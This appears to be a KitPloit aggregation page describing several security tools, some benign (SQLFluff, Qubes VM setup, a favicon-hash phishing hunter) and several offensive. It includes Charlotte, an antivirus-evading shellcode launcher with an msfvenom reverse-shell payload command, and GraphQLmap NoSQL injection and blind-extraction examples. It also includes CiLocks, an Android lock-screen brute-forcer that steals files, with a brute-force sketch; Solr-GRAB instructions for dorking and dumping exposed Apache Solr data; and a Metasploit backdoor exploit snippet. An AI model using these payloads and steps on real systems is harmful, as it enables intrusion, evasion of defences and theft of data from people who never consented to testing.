KitPloit - PenTest Tools!

AutoPentest-DRL - Automated Penetration Testing Using Deep Reinforcement Learning



AutoPentest-DRL is an automated penetration testing framework based on Deep Reinforcement Learning (DRL) techniques. The framework determines the most appropriate attack path for a given network, and can be used to execute a simulated attack on that network via penetration testing tools, such as Metasploit. AutoPentest-DRL is being developed by the Cyber Range Organization and Design (CROND) NEC-endowed chair at the Japan Advanced Institute of Science and Technology (JAIST) in Ishikawa, Japan.

An overview of AutoPentest-DRL is shown below. The framework can use network scanning tools, such as Nmap, to find vulnerabilities in the target network; otherwise, user input is employed instead. The MulVAL attack-graph generator is used to determine potential attack trees, which are then fed in a simplified form into the DQN Decision Engine. The attack path that is produced as output can be fed into penetration testing tools, such as Metasploit, to conduct an attack on a real target network, or used with a logical network instead, for example for educational purposes. In addition, a topology generation algorithm is used to produce multiple network topologies that are used to train the DQN.


Next we provide brief information on how to set up and use AutoPentest-DRL. For details, please refer to the User Guide that we also make available.


Prerequisites

Several external tools are needed in order to use AutoPentest-DRL, as follows:

  • MulVAL: Attack-graph generator used by AutoPentest-DRL to produce possible attack paths for a given network. See the MulVAL page for installation instructions. MulVAL should be installed in the directory repos/mulval in the AutoPentest-DRL folder. You also need to configure the /etc/profile file as discussed here.

  • Nmap: Network scanner used by AutoPentest-DRL to determine vulnerabilities in a given real network. The command needed to install nmap on Ubuntu is given below:

    sudo apt-get install nmap
  • Metasploit: Penetration testing tool used by AutoPentest-DRL to actually conduct the attack proposed by the DQN engine on the real target network. To install Metasploit, you can use the installers made available on the Metasploit website. In addition, we use pymetasploit3 as an RPC API to communicate with Metasploit; this tool needs to be installed in the directory Penetration_tools/pymetasploit3 by following its author's instructions.
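
As an illustration of that last prerequisite, below is a minimal sketch of driving Metasploit through pymetasploit3's RPC client (the password, module and target are placeholders taken from the pymetasploit3 documentation, not from AutoPentest-DRL itself):

# Minimal pymetasploit3 sketch; assumes msfrpcd was started with:
#   msfrpcd -P yourpassword
from pymetasploit3.msfrpc import MsfRpcClient

client = MsfRpcClient('yourpassword', ssl=True)            # placeholder creds
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
exploit['RHOSTS'] = '10.0.0.5'                              # example target
print(exploit.execute(payload='cmd/unix/interact'))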


Setup

AutoPentest-DRL has been developed mainly on the Ubuntu 18.04 LTS operating system; other OSes may work, but have not been tested. In order to set up AutoPentest-DRL, use the releases page to download the latest version, and extract the source code archive into a directory of your choice (for instance, your home directory) on the host on which you intend to use it.

AutoPentest-DRL is implemented in Python, and it requires several packages to run. The file requirements.txt included with the distribution can be used to install the necessary packages via the following command that should be run from the AutoPentest-DRL/ directory:

$ sudo -H pip install -r requirements.txt

The last step is to install the database, which contains information about real hosts and vulnerabilities. For this purpose, download the asset file named database.tgz from the release page, and extract it into the Database/ directory.


Quick Start

The simplest way to use AutoPentest-DRL is to start it in the logical attack mode that will determine the optimal attack path for a given logical network. For more information about this and the other operation modes, real attack mode and training mode, see our User Guide.

In order to use the logical attack mode on a sample network topology, run the following command from a terminal window:

$ python3 ./AutoPentest-DRL.py logical_attack

The logical network topology used in this attack mode is described in the file MulVal_P/logical_attack.P, which includes details about the servers, their connections, and their vulnerabilities. This file can be modified following the syntax described in the MulVAL documentation.

In the logical attack mode no actual attack is conducted; only the optimal attack path is provided as output. By referring to the visualization of the attack graph generated by MulVAL in the file mulval_results/AttackGraph.pdf, you can study the attack steps in detail. The figures below provide examples of such output.


References

For a research background regarding AutoPentest-DRL, please refer to the following paper:

  • Z. Hu, R. Beuran, Y. Tan, "Automated Penetration Testing Using Deep Reinforcement Learning", IEEE European Symposium on Security and Privacy Workshops (EuroS&PW 2020), Workshop on Cyber Range Applications and Technologies (CACOE'20), Genova, Italy, September 7, 2020, pp. 2-10.

For a list of contributors to this project, see the file CONTRIBUTORS included in the distribution.




DivideAndScan - Divide Full Port Scan Results And Use It For Targeted Nmap Runs



Divide Et Impera And Scan (and also merge the scan results)


DivideAndScan is used to automate the port scanning routine efficiently by splitting it into 3 phases:

  1. Discover open ports for a bunch of targets.
  2. Run Nmap individually for each target with version grabbing and NSE actions.
  3. Merge the results into a single Nmap report (different formats available).

For the 1st phase, a fast port scanner is intended to be used (Masscan / RustScan / Naabu), whose output is parsed and stored in a database (TinyDB). Next, during the 2nd phase, individual Nmap scans are launched for each target with its set of open ports (multiprocessing is supported) according to the database data. Finally, in the 3rd phase, the separate Nmap outputs are merged into a single report in different formats (XML / HTML / simple text / grepable) with nMap_Merger.
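
For a feel of how phase 1 data might be stored, here is a minimal sketch (not DivideAndScan's actual code) that parses hypothetical "ip:port" findings into TinyDB and builds a phase 2 Nmap command line:

# Sketch of phases 1-2: store open ports in TinyDB, then build an Nmap run.
from tinydb import TinyDB, Query

db = TinyDB('.db/db.json')
for line in open('scanner_output.txt'):        # hypothetical parsed output
    ip, port = line.strip().split(':')
    db.insert({'ip': ip, 'port': int(port)})

Host = Query()
ports = [r['port'] for r in db.search(Host.ip == '192.168.1.10')]
print(f"nmap -p{','.join(map(str, ports))} 192.168.1.10")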

Potential use cases:

  • Pentest engagements / red teaming with a large scope to enumerate.
  • Cybersecurity wargames / training CTF labs.
  • OSCP certification exam.

How It Works



How to Install

Prerequisites

To successfully divide and scan we need to get some good port scanning tools.

Note: if you don't feel like messing with dependencies on your host OS, skip to the Docker part.
Nmap
sudo apt install nmap xsltproc -y
sudo nmap --script-updatedb

Masscan
cd /tmp
git clone https://github.com/robertdavidgraham/masscan.git
cd masscan
make
sudo make install
cd && rm -rf /tmp/masscan

RustScan
cd /tmp

wget -qO- https://api.github.com/repos/RustScan/RustScan/releases/latest \
| grep "browser_download_url.*amd64.deb" \
| cut -d: -f2,3 \
| tr -d \" \
| wget -qO rustscan.deb -i-

sudo dpkg -i rustscan.deb
cd && rm /tmp/rustscan.deb

sudo wget https://gist.github.com/snovvcrash/c7f8223cc27154555496a9cbb4650681/raw/a76a2c658370d8b823a8a38a860e4d88051b417e/rustscan-ports-top1000.toml -O /root/.rustscan.toml

Naabu
sudo mkdir /opt/projectdiscovery
cd /opt/projectdiscovery

wget -qO- https://api.github.com/repos/projectdiscovery/naabu/releases/latest \
| grep "browser_download_url.*linux-amd64.tar.gz" \
| cut -d: -f2,3 \
| tr -d \" \
| sudo wget -qO naabu.tar.gz -i-

sudo tar -xvzf naabu.tar.gz
sudo mv naabu-linux-amd64 naabu
sudo rm naabu.tar.gz README.md LICENSE.md
sudo ln -vs /opt/projectdiscovery/naabu /usr/local/bin/naabu

Installation

DivideAndScan is available on PyPI as divideandscan, though I recommend installing it from GitHub with pipx in order to always have the bleeding-edge version:

~$ pipx install -f "git+https://github.com/snovvcrash/DivideAndScan.git"
~$ das

For debugging purposes you can set up a dev environment with poetry:

~$ git clone https://github.com/snovvcrash/DivideAndScan
~$ cd DivideAndScan
~$ poetry install
~$ poetry run das

Note: DivideAndScan uses sudo to run all the port scanners, so it will ask for the password when scanning commands are invoked.
Using from Docker

You can run DivideAndScan in a Docker container as follows:

~$ docker run -it --rm --name das -v `pwd`:/app snovvcrash/divideandscan

Since the tool requires some input data and produces some output data, you should specify your current working directory as the mount point at /app within the container. You may want to set an alias to make the base command shorter:

~$ alias das='docker run -it --rm --name das -v `pwd`:/app snovvcrash/divideandscan'
~$ das

How to Use



0. Preparations

Make a new directory to start DivideAndScan from. The tool will create subdirectories in CWD to store the output, so I recommend launching it from a clean directory to stay organized:

~$ mkdir divideandscan
~$ cd divideandscan

1. Filling the DB

Provide the add module with a command for a fast port scanner to discover open ports in a desired range.

Warning: please, make sure that you understand what you're doing, because nearly all port scanning tools can damage the system being tested if used improperly.
# Masscan
~$ das add masscan '--rate 1000 -iL hosts.txt -p1-65535 --open'
# RustScan
~$ das add rustscan '-b 1000 -t 2000 -u 5000 -a hosts.txt -r 1-65535 -g --no-config'
# Naabu
~$ das add naabu '-rate 1000 -iL hosts.txt -p - -silent -s s'
# Nmap, -v flag is always required for correct parsing!
~$ das add nmap '-n -Pn --min-rate 1000 -T4 -iL hosts.txt -p1-65535 --open -v'

When the module completes its work, a hidden directory .db is created in CWD containing the database file and raw scan results.


2. Targeted Scanning

Launch targeted Nmap scans with the scan module. You can adjust the scan surface with either -hosts or -ports option:

# Scan by hosts
~$ das scan -hosts all -oA report1
~$ das scan -hosts 192.168.1.0/24,10.10.13.37 -oA report1
~$ das scan -hosts hosts.txt -oA report1
# Scan by ports
~$ das scan -ports all -oA report2
~$ das scan -ports 22,80,443,445 -oA report2
~$ das scan -ports ports.txt -oA report2

To start Nmap simultaneously in multiple processes, specify the -parallel switch and set the number of workers with the -proc option (if no value is provided, it will default to the number of processors on the machine):

~$ das scan -hosts all -oA report -parallel [-proc 4]

The output format is selected with the -oX, -oN, -oG and -oA options for XML+HTML, simple text, grepable and all formats respectively. When the module completes its work, a hidden directory .nmap is created in CWD containing the Nmap raw scan reports.

Also, you can inspect the contents of the database with the -show option before actually launching the scans:

~$ das scan -hosts all -show

3 (Optional). Merging the Reports

In order to generate a report independently of the scan module, you should use the report module. It will search for Nmap raw scan reports in the .nmap directory and process and merge them based on either the -hosts or -ports option:

# Merge outputs by hosts
~$ das report -hosts all -oA report1
~$ das report -hosts 192.168.1.0/24,10.10.13.37 -oA report1
~$ das report -hosts hosts.txt -oA report1
# Merge outputs by ports
~$ das report -ports all -oA report2
~$ das report -ports 22,80,443,445 -oA report2
~$ das report -ports ports.txt -oA report2

Note: keep in mind that the report module does not search the DB when processing the -hosts or -ports options, but looks for Nmap raw reports directly in the .nmap directory instead; this means that the -hosts 127.0.0.1 argument value will be successfully resolved only if a .nmap/127-0-0-1.* file exists, and the -ports 80 argument value will be successfully resolved only if a .nmap/port80.* file exists.
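
For illustration, merging Nmap XML reports essentially boils down to copying every <host> element into one document; a rough Python equivalent of what nMap_Merger automates (file names are placeholders):

# Sketch: merge all <host> elements from .nmap/*.xml into a single report.
import glob
import xml.etree.ElementTree as ET

reports = sorted(glob.glob('.nmap/*.xml'))
merged = ET.parse(reports[0])                  # first report is the base
root = merged.getroot()
for path in reports[1:]:
    for host in ET.parse(path).getroot().iter('host'):
        root.append(host)
merged.write('report-merged.xml')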

Help
usage: das [-h] {add,scan,report} ...

[DivideAndScan ASCII-art banner]
{@snovvcrash} {https://github.com/snovvcrash/DivideAndScan} {vX.Y.Z}

positional arguments:
{add,scan,report}
add run a full port scan {masscan,rustscan,naabu,nmap} and add the output to DB
scan run targeted Nmap scans against hosts and ports from DB
report merge separate Nmap outputs into a single report in different formats

optional arguments:
-h, --help show this help message and exit

Psst, hey buddy... Wanna do some organized p0r7 5c4nn1n6?



GraphQLmap - A Scripting Engine To Interact With A Graphql Endpoint For Pentesting Purposes



GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.


Install
$ git clone https://github.com/swisskyrepo/GraphQLmap
$ python graphqlmap.py
[GraphQLmap ASCII-art banner]
Author: @Swissky   Version: 1.0
usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [--method [METHOD]] [--headers [HEADERS]]

optional arguments:
-h, --help show this help message and exit
-u URL URL to query : example.com/graphql?query={}
-v [VERBOSITY] Enable verbosity
--method [METHOD] HTTP Method to use interact with /graphql endpoint
--headers [HEADERS] HTTP Headers sent to /graphql endpoint
--json Send requests using POST and JSON

Features and examples

Examples are based on several CTF challenges from HIP2019.
Connect to a graphql endpoint
python3 graphqlmap.py -u https://yourhostname.com/graphql -v --method POST --headers '{"Authorization" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o"}'

Dump a GraphQL schema

Use dump_new to dump the GraphQL schema; this function will automatically populate the "autocomplete" with the found fields.

Live Example

GraphQLmap > dump_new                     
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)

Query
doctor[]: email (String!),
doctors[Doctor]:
patients[Patient]:
patient[]: id (ID!),
allrendezvous[Rendezvous]:
rendezvous[]: id (ID!),
Doctor
id[ID]:
firstName[String]:
lastName[String]:
specialty[String]:
patients[None]:
rendezvous[None]:
email[String]:
password[String]:
[...]
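
Schema dumps like this are typically built on a GraphQL introspection query; a minimal hand-rolled sketch of the same idea (not GraphQLmap's actual code; the endpoint is a placeholder):

# Fetch type and field names via GraphQL introspection.
import requests

INTROSPECTION = '{__schema{types{name fields{name}}}}'
r = requests.post('https://yourhostname.com/graphql', json={'query': INTROSPECTION})
for t in r.json()['data']['__schema']['types']:
    print(t['name'], [f['name'] for f in (t['fields'] or [])])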

Interact with a GraphQL endpoint

Write a GraphQL request and execute it.

GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}
{
"data": {
"doctors": [
{
"firstName": "Admin",
"id": "5d089c51dcab2d0032fdd08d",
"lastName": "Admin"
}
]
}
}

GraphQL field fuzzing

Use GRAPHQL_INCREMENT and GRAPHQL_CHARSET to fuzz a parameter.

Live Example

GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"AdmiGRAPHQL_CHARSET\"} }"){firstName lastName id}}   
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi!\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi$\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi%\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi(\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi)\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi*\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi+\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi,\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi-\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi.\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi/\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi0\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi1\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi?\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}

NoSQL injection

Use BLIND_PLACEHOLDER inside the query for the nosqli function.

Live Example

GraphQLmap > nosqli
Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
Check > 5d089c51dcab2d0032fdd08d
Charset > 0123456789abcdef-
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
GraphQLmap >

SQL injection
GraphQLmap > postgresqli
GraphQLmap > mysqli
GraphQLmap > mssqli

TODO
  • Docker with vulnerable GraphQL
  • Unit tests
  • Handle node
{
user {
edges {
node {
username
}
}
}
}


Charlotte - C++ Fully Undetected Shellcode Launcher



c++ fully undetected shellcode launcher ;)

releasing this to celebrate the birth of my newborn


description

13/05/2021:

  1. c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
  2. dynamic invoking of win32 api functions
  3. XOR encryption of shellcode and function names
  4. randomised XOR keys and variables per run
  5. on Kali Linux, simply 'apt-get install mingw-w64*' and that's it!

17/05/2021:

  1. random strings length and XOR keys length
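
The core idea behind the randomised XOR encryption can be sketched in a few lines of Python (illustrative only; this is not charlotte.py itself):

# XOR the shellcode bytewise with a random key generated per run.
import os

def xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

key = os.urandom(9)                          # v1.1 randomises key lengths too
shellcode = open('beacon.bin', 'rb').read()
encrypted = xor(shellcode, key)
assert xor(encrypted, key) == shellcode      # XOR is its own inverse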

antiscan.me



usage

git clone the repository, generate your shellcode file named beacon.bin, and run charlotte.py

example:

  1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
  2. cd charlotte
  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
  4. python charlotte.py
  5. profit

tested with msfvenom -p (shown in the .gif POC below) and also with Cobalt Strike raw format payloads



update v1.1

17/05/21:

apparently Microsoft Windows Defender was able to detect the .DLL binary,

and how did they flag it? by looking for several XOR keys of 16-byte size

changing the key size to 9, as shown in the POC .gif below, makes it undetected again

cheers!




SQLFluff - A SQL Linter And Auto-Formatter For Humans



SQLFluff is a dialect-flexible and configurable SQL linter. Designed with ELT applications in mind, SQLFluff also works with jinja templating and dbt. SQLFluff will auto-fix most linting errors, allowing you to focus your time on what matters.


Getting Started

To get started, install the package and run sqlfluff lint or sqlfluff fix.

$ pip install sqlfluff
$ echo " SELECT a + b FROM tbl; " > test.sql
$ sqlfluff lint test.sql
== [test.sql] FAIL
L: 1 | P: 1 | L003 | Single indentation uses a number of spaces not a multiple of 4
L: 1 | P: 14 | L006 | Operators should be surrounded by a single space unless at the start/end of a line
L: 1 | P: 27 | L001 | Unnecessary trailing whitespace

You can also have a play using SQLFluff online.

For full CLI usage and rules reference, see the docs.
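
SQLFluff also exposes a Python API alongside the CLI; a small sketch based on its documented simple API (treat the exact result keys as an assumption):

import sqlfluff

violations = sqlfluff.lint("SELECT  a+b FROM tbl;", dialect="ansi")
for v in violations:
    print(v["code"], v["description"])

print(sqlfluff.fix("SELECT  a+b FROM tbl;", dialect="ansi"))  # auto-fixed SQL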


Documentation

For full documentation visit docs.sqlfluff.com.


Releases

SQLFluff is in beta phase - expect the tool to change significantly, with potentially non-backward-compatible API and configuration changes, in future releases. If you'd like to join in, please consider contributing.

New releases are made monthly. For more information, visit Releases.


SQLFluff on Slack

We have a fast-growing community on Slack, come and join us!

https://join.slack.com/t/sqlfluff/shared_invite/zt-o1f4x0e8-pZzarAIlQmKj_6ZwD16w0g


Contributing

There's lots to do in this project, and we're just getting started. If you want to understand more about the architecture of SQLFluff, you can find more here.

If you'd like to contribute, check out the open issues on GitHub. You can also see the guide to contributing.



AMSITrigger - The Hunt For Malicious Strings



Hunting for Malicious Strings

Usage:
-i, --inputfile=VALUE       Powershell filename
-u, --url=VALUE URL eg. https://10.1.1.1/Invoke-NinjaCopy.ps1
-f, --format=VALUE Output Format:
1 - Only show Triggers
2 - Show Triggers with Line numbers
3 - Show Triggers inline with code
4 - Show AMSI calls (xmas tree mode)
-d, --debug Show Debug Info
-m, --maxsiglength=VALUE Maximum signature Length to cater for,
default=2048
-c, --chunksize=VALUE Chunk size to send to AMSIScanBuffer,
default=4096
-h, -?, --help Show Help

For details see https://www.rythmstick.net/posts/amsitrigger



MurMurHash - Tool To Calculate A MurmurHash Value Of A Favicon To Hunt Phishing Websites On The Shodan Platform



This little tool is to calculate a MurmurHash value of a favicon to hunt phishing websites on the Shodan platform.


What is MurMurHash?

MurmurHash is a non-cryptographic hash function suitable for general hash-based lookup. The name comes from two basic operations, multiply (MU) and rotate (R), used in its inner loop. The current version is MurmurHash3 which yields a 32-bit or 128-bit hash value. When using 128-bits, the x86 and x64 versions do not produce the same values, as the algorithms are optimized for their respective platforms. MurmurHash3 was released alongside SMHasher—a hash function test suite.

Further reading on: https://en.wikipedia.org/wiki/MurmurHash


How to install?
git clone https://github.com/Viralmaniar/MurMurHash.git
cd MurMurHash
pip install -r requirements.txt
python MurMurHash.py

Detailed Blog:

https://isc.sans.edu/diary/Hunting+phishing+websites+with+favicon+hashes/27326


Hunting Phish Events for Paypal & Tesla:

After reading about hunting phishing websites using favicon hashes, I thought I'd generalise it to accept favicon URLs for quick analysis on Shodan.
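
The favicon-hash technique that MurMurHash.py automates boils down to a few lines; Shodan's http.favicon.hash filter expects the MurmurHash3 value of the base64-encoded favicon bytes (the URL below is a placeholder):

# Compute a Shodan-style favicon hash with the mmh3 library.
import codecs
import mmh3
import requests

favicon = requests.get('https://www.example.com/favicon.ico').content
b64 = codecs.encode(favicon, 'base64')       # keeps newlines, as Shodan expects
print('Shodan dork: http.favicon.hash:%d' % mmh3.hash(b64))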

Looking for a favicon icon file on the original website of PayPal:



Using the MurMurHash.py file to generate a hash of the icon:



Searching on Shodan for Paypal phishing domains/IPs:


Validating Shodan results:

Now, let's search for the Tesla icon on the original site:



Searching on Shodan for Tesla phishing domains/IPs:

Validating Shodan results:



Questions?

Twitter: @ManiarViral
LinkedIn: https://au.linkedin.com/in/viralmaniar



CiLocks - Android LockScreen Bypass



CiLocks - Android LockScreen Bypass


Features
  • Brute Pin 4 Digit
  • Brute Pin 6 Digit
  • Brute LockScreen Using Wordlist
  • Bypass LockScreen {Antiguard} Not Support All OS Version
  • Root Android {Supersu} Not Support All OS Version
  • Steal File
  • Reset Data

Required

- Adb {Android SDK}
- Cable Usb
- Android Emulator {NetHunter/Termux} Root
- Or Computer

Compatible

- Linux
- Windows
- Mac

Tested On

- Kali Linux

How To Run

- git clone https://github.com/tegal1337/CiLocks
- cd CiLocks
- chmod +x cilocks
- bash cilocks


For Android Emulator

- Install Busybox
- Root

If brute forcing doesn't work, uncomment this code:

`# adb shell input keyevent 26`

After 5 wrong passwords, the lock screen will automatically delay for 30 seconds.
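
For context, the underlying ADB PIN brute force idea looks roughly like this Python sketch (illustrative; not CiLocks' actual code; keyevent 66 is Enter):

# Try every 4-digit PIN over ADB, pausing to respect the lockout delay.
import subprocess
import time

for pin in range(10000):
    candidate = f"{pin:04d}"
    subprocess.run(["adb", "shell", "input", "text", candidate])
    subprocess.run(["adb", "shell", "input", "keyevent", "66"])   # press Enter
    time.sleep(0.5)
    if pin and pin % 5 == 0:
        time.sleep(30)        # 5 wrong attempts trigger a 30-second delay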

Solr-GRAB - Steal Apache Solr Instance Queries With Or Without A Username And Password



Steal Apache Solr instance Queries with or without a username and password.

DISCLAIMER: This project should be used for authorized testing and educational purposes only.


Download
git clone https://github.com/GnosticPlayers/Solr-GRAB

Usage

You can search for Apache Solr instances via Censys, with the dork "Welcome To Solr" or "Apache Solr Admin". To grab queries, simply go to the HTTP access point, sometimes on port 80, 443 or 8080.

  • Replace "http://URLHERE/" with a desired URL, such as "http://127.0.0.1/".
  • Replace "PROJECTHERE/" with a desired project entry, such as a directory "users/".
  • Replace "IDHERE" with an ID that is unique per entry in JSON on the apache solr query, such as "id" or "global_id".
  • Lastly, replace "AMOUNTOFROWSHERE" with the number of rows found in the query, such as "74332".

Now execute it with: bash index.sh.

Sometimes you'll get a 404 Not Found error. If that's the case, add "/solr/" between "http://URLHERE/" & "PROJECTHERE", such as: https://127.0.0.1/solr/users/. This should fix the problem.
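
For reference, the request index.sh builds corresponds to a standard Solr select query; a Python sketch using the same placeholders:

# Build the Solr select query that dumps rows from a collection.
import requests

url = "http://URLHERE/solr/PROJECTHERE/select"
params = {"q": "*:*", "fl": "IDHERE", "rows": "AMOUNTOFROWSHERE", "wt": "json"}
print(requests.get(url, params=params).json())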


Author & Credits

Written by GnosticPlayers & g9648


g9648

Email: g9648@riseup.net


Gnostic Contacts

Email: dreammarket@riseup.net



Php_Code_Analysis - Scan your PHP code for vulnerabilities



This script will scan your code

The script can find:

  1. check_file_upload issues
  2. host_header_injection
  3. SQL injection
  4. insecure deserialization
  5. open_redirect
  6. SSRF
  7. XSS
  8. LFI
  9. command_injection

features
  1. fast
  2. simple report

usage:
python code.py <file name> >>> this will scan one file
python code.py >>> this will scan full folder (.)
python code.py <path> >>> scan full folder
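
A toy illustration of the pattern-based scanning approach such a script can take (these regexes are illustrative, not this project's actual rules):

# Scan a PHP file for a few classic sink patterns and print hit locations.
import re
import sys

PATTERNS = {
    "command_injection": r"\b(exec|system|shell_exec|passthru)\s*\(",
    "LFI": r"\b(include|require)(_once)?\s*\(?\s*\$_(GET|POST|REQUEST)",
    "XSS": r"\becho\s+\$_(GET|POST|REQUEST)",
}

source = open(sys.argv[1]).read()
for name, pattern in PATTERNS.items():
    for m in re.finditer(pattern, source):
        line_no = source.count("\n", 0, m.start()) + 1
        print(f"[{name}] line {line_no}")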

Qvm-Create-Windows-Qube - Spin Up New Windows Qubes Quickly, Effortlessly And Securely



qvm-create-windows-qube is a tool for quickly and conveniently installing fresh new Windows qubes with Qubes Windows Tools (QWT) drivers automatically. It officially supports Windows 7, 8.1 and 10 as well as Windows Server 2008 R2, 2012 R2, 2016 and 2019.

The project emphasizes correctness, security and treating Windows as an untrusted guest operating system throughout the entire process. It also features other goodies such as automatic installation of packages including Firefox, Office 365, Notepad++, Visual Studio and more using Chocolatey.


Installation
  1. Download the installation script by opening the link, right-clicking and then selecting "Save [Page] as..."
  2. Copy install.sh into Dom0 by running the following command in Dom0:
    • qvm-run -p --filter-escape-chars --no-color-output <qube_script_is_located_on> "cat '/home/user/Downloads/install.sh'" > install.sh
  3. Review the code of install.sh to ensure its integrity
    • Safer with escape character filtering enabled above; qvm-run disables it by default when output is a file
  4. Run chmod +x install.sh && ./install.sh
    • Note that this will install packages in the global default TemplateVM, which is fedora-XX by default
  5. Review the code of the resulting qvm-create-windows-qube.sh

A more streamlined and secure installation process with packaging will be shipping with Qubes R4.1.


Usage
Usage: ./qvm-create-windows-qube.sh [options] -i <iso> -a <answer file> <name>
-h, --help
-c, --count <number> Number of Windows qubes with given basename desired
-t, --template Make this qube a TemplateVM instead of a StandaloneVM
-n, --netvm <qube> NetVM for Windows to use
-s, --seamless Enable seamless mode persistently across reboots
-o, --optimize Optimize Windows by disabling unnecessary functionality for a qube
-y, --spyless Configure Windows telemetry settings to respect privacy
-w, --whonix Apply Whonix recommended settings for a Windows-Whonix-Workstation
-p, --packages <packages> Comma-separated list of packages to pre-install (see available packages at: https://chocolatey.org/packages)
-i, --iso <file> Windows media to automatically install and setup
-a, --answer-file <xml file> Settings for Windows installation

Downloading Windows ISO

The windows-media/isos/download-windows.sh script (in windows-mgmt) securely downloads the official Windows ISO to be used by qvm-create-windows-qube.


Creating Windows VM

Windows 10

./qvm-create-windows-qube.sh -n sys-firewall -oyp firefox,notepadplusplus,office365proplus -i win10x64.iso -a win10x64-pro.xml work-win10

./qvm-create-windows-qube.sh -n sys-firewall -oyp steam -i win10x64.iso -a win10x64-pro.xml game-console


Windows Server 2019

./qvm-create-windows-qube.sh -n sys-firewall -oy -i win2019-eval.iso -a win2019-datacenter-eval.xml fs-win2019


Windows 10 LTSC
  • A more stable, minified, secure and private version of Windows 10 officially provided by Microsoft

./qvm-create-windows-qube.sh -n sys-firewall -oyp firefox,notepadplusplus,office365proplus -i win10x64-ltsc-eval.iso -a win10x64-ltsc-eval.xml work-win10

./qvm-create-windows-qube.sh -n sys-whonix -oyw -i win10x64-ltsc-eval.iso -a win10x64-ltsc-eval.xml anon-win10


Windows 7
  • Not recommended because Windows 7 is no longer supported by Microsoft, however, it's the only desktop OS the Qubes GUI driver (in Qubes Windows Tools) supports if seamless window integration or dynamic resizing is required
  • See the Security > Windows > Advisories section below for more info

./qvm-create-windows-qube.sh -n sys-firewall -soyp firefox,notepadplusplus,office365proplus -i win7x64-ultimate.iso -a win7x64-ultimate.xml work-win7


Security

qvm-create-windows-qube is "reasonably secure" as Qubes would have it.

  • windows-mgmt is air gapped
  • The entirety of the Windows qube setup process is done air gapped
    • There is an exception for installing packages at the very end of the Windows qube installation
  • An entire class of command injection vulnerabilities is eliminated in the Dom0 shell script by not letting it parse any output from the untrusted windows-mgmt qube
    • Only exit codes are passed by qvm-run; no variables
    • This also mitigates the fallout of another Shellshock Bash vulnerability
  • Downloading of the Windows ISOs is made secure by enforcing:
    • ISOs are downloaded straight from Microsoft controlled subdomains of microsoft.com
    • HTTPS TLS 1.2/1.3
    • HTTP public key pinning (HPKP) to whitelist the website's certificate instead of relying on certificate authorities (CAs)
      • Qubes aims to "distrust the infrastructure"
      • Remember, transport security = encryption * authentication (This allows for the utmost authentication)
    • SHA-256 verification of the files after download (a minimal sketch of this check follows this list)
  • Windows is treated as an untrusted guest operating system the entire way through
  • All commits by the maintainers are always signed with their respective PGP keys
    • Should signing ever cease, assume compromise
    • Current maintainer 1: Elliot Killick
      • PGP key: 018F B9DE 6DFA 13FB 18FB 5552 F9B9 0D44 F83D D5F2
    • Current maintainer 2: Frédéric Pierret (No Keybase account)
      • PGP key: 9FA6 4B92 F95E 706B F28E 2CA6 4840 10B5 CDC5 76E2
      • Mostly concerned with Qubes R4.1 support
  • The impact of any theoretical vulnerabilities in handling of the Windows ISO (e.g. vulnerability in filesystem parsing) or answer file is limited to windows-mgmt
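
As referenced in the list above, a minimal Python sketch of the post-download SHA-256 check (the file name and expected hash are placeholders, not the project's pinned values):

# Verify a downloaded ISO against a pinned SHA-256 hash.
import hashlib

EXPECTED_SHA256 = "0" * 64                    # placeholder for the pinned hash
h = hashlib.sha256()
with open("win10x64.iso", "rb") as f:
    for chunk in iter(lambda: f.read(1 << 20), b""):
        h.update(chunk)
assert h.hexdigest() == EXPECTED_SHA256, "ISO hash mismatch!"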

Windows

Maintenance

